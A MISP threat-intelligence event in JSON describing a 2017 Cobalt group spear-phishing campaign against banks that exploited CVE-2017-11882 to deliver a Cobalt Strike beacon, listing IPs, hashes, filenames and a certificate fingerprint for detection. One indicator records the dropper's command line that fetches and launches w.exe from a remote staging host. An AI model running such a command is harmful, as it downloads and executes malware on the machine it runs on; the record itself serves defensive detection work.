{
"Event": {
"analysis": "2",
"date": "2017-12-04",
"extends_uuid": "",
"info": "OSINT - Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions",
"publish_timestamp": "1514467711",
"published": true,
"threat_level_id": "3",
"timestamp": "1512442830",
"uuid": "5a25117c-6260-44a1-91b4-489d02de0b81",
"Orgc": {
"name": "CIRCL",
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
},
"Tag": [
{
"colour": "#0088cc",
"name": "misp-galaxy:threat-actor=\"Cobalt\""
},
{
"colour": "#ffffff",
"name": "tlp:white"
},
{
"colour": "#6edb00",
"name": "circl:topic=\"finance\""
}
],
"Attribute": [
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1512378829",
"to_ids": false,
"type": "link",
"uuid": "5a25118a-c6f8-4fed-9728-45e002de0b81",
"value": "https://www.riskiq.com/blog/labs/cobalt-strike/",
"Tag": [
{
"colour": "#00223b",
"name": "osint:source-type=\"blog-post\""
},
{
"colour": "#007ed9",
"name": "osint:certainty=\"93\""
}
]
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1512378829",
"to_ids": false,
"type": "text",
"uuid": "5a2511a6-d02c-4685-9c2f-458702de0b81",
"value": "In a recent spear-phishing campaign, the Cobalt Hacking Group exploited a remote code execution vulnerability in Microsoft Office (CVE-2017-11882) to deploy a Cobalt Strike beacon that connects to its command and control server. However, they gave up much more information than they intended.\r\n\r\nOn Tuesday, November 21, a massive spear-phishing campaign began targeting individual employees at various financial institutions, mostly in Russia and Turkey. Purporting to provide info on changes to \u2018SWIFT\u2019 terms, the email contained a single attachment with no text in the body.",
"Tag": [
{
"colour": "#00223b",
"name": "osint:source-type=\"blog-post\""
},
{
"colour": "#007ed9",
"name": "osint:certainty=\"93\""
}
]
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1512380693",
"to_ids": false,
"type": "vulnerability",
"uuid": "5a251915-1914-4a0a-bf26-453102de0b81",
"value": "CVE-2017-11882"
},
{
"category": "Artifacts dropped",
"comment": "Process command line spawned by the exploit document; the w.exe it launches from the UNC path is the Cobalt Strike beacon (see the second file object). The trailing '&AAAAAC' is not a meaningful command and looks like residue from the exploit buffer, so anchor detections on cmd.exe starting an executable from a UNC path rather than on the full string.",
"deleted": false,
"disable_correlation": false,
"timestamp": "1512380719",
"to_ids": true,
"type": "text",
"uuid": "5a25192f-78d8-43ac-a5e7-448402de0b81",
"value": "cmd /c start \\\\138.68.234.128\\w\\w.exe &AAAAAC"
},
{
"category": "Payload delivery",
"comment": "At RiskIQ, one of the datasets built from our large quantities of Internet data is a repository of SSL certificates and where we\u2019ve seen them. What\u2019s interesting about the case mentioned above is that the host is using a certificate seemingly shipped with Cobalt Strike by default. We can look up the certificate in RiskIQ Community via its SHA1 fingerprint. Note that because this is the default Cobalt Strike certificate, the fingerprint identifies any team server left with the stock keystore, not this actor specifically; treat it as a shared, high-signal indicator and pair it with the destination IP before attributing a hit to this campaign.",
"deleted": false,
"disable_correlation": false,
"timestamp": "1512380757",
"to_ids": true,
"type": "x509-fingerprint-sha1",
"uuid": "5a251955-b768-423a-9ce5-43dc02de0b81",
"value": "6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1512380798",
"to_ids": false,
"type": "link",
"uuid": "5a25197e-d52c-4094-a610-4e3b02de0b81",
"value": "https://community.riskiq.com/projects/19bb67dd-2c51-7284-e5f2-7b79537e13d3"
},
{
"category": "Network activity",
"comment": "Payload staging server; the dropped command line fetches w.exe from this host via a UNC path (\\\\138.68.234.128\\w\\w.exe), i.e. an outbound SMB/WebDAV fetch, so egress to this IP on 445/tcp is a strong detection point.",
"deleted": false,
"disable_correlation": false,
"timestamp": "1512380833",
"to_ids": true,
"type": "ip-dst",
"uuid": "5a2519a1-f3c4-4887-bb32-4b8102de0b81",
"value": "138.68.234.128"
},
{
"category": "Network activity",
"comment": "Cobalt Strike command and control server; the host presented the TLS certificate shipped with Cobalt Strike by default (see the x509-fingerprint-sha1 attribute).",
"deleted": false,
"disable_correlation": false,
"timestamp": "1512380833",
"to_ids": true,
"type": "ip-dst",
"uuid": "5a2519a1-34b0-4da9-b685-421e02de0b81",
"value": "104.144.207.207"
}
],
"Object": [
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "6",
"timestamp": "1512380890",
"uuid": "5a2519da-6f38-4196-a492-431202de0b81",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "text",
"timestamp": "1512380890",
"to_ids": false,
"type": "text",
"uuid": "5a2519da-713c-487e-9409-4c9f02de0b81",
"value": "CVE-2017-11882 exploit document (RTF attachment 'Swift changes.rtf') downloading the Cobalt Strike beacon w.exe",
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1512380890",
"to_ids": true,
"type": "filename",
"uuid": "5a2519da-f360-49ce-ae02-4ac902de0b81",
"value": "Swift changes.rtf"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1512380890",
"to_ids": true,
"type": "md5",
"uuid": "5a2519da-a874-4de4-9030-481a02de0b81",
"value": "f360d41a0b42b129f7f0c29f98381416"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "state",
"timestamp": "1512380890",
"to_ids": false,
"type": "text",
"uuid": "5a2519da-6460-4c26-92fa-471202de0b81",
"value": "Malicious"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "6",
"timestamp": "1512380963",
"uuid": "5a251a0c-d1c4-43ca-b569-448202de0b81",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "text",
"timestamp": "1512380963",
"to_ids": false,
"type": "text",
"uuid": "5a251a0c-0f24-48b7-a276-48d702de0b81",
"value": "Cobalt Strike beacon"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1512380963",
"to_ids": true,
"type": "filename",
"uuid": "5a251a0c-fa00-40c4-a370-448e02de0b81",
"value": "w.exe"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1512380963",
"to_ids": true,
"type": "md5",
"uuid": "5a251a0c-dadc-4a74-8939-475802de0b81",
"value": "d46df9eacfe7ff75e098942e541d0f18"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "state",
"timestamp": "1512380963",
"to_ids": false,
"type": "text",
"uuid": "5a251a0c-e3d8-4b12-94d0-466702de0b81",
"value": "Malicious"
}
]
}
]
}
}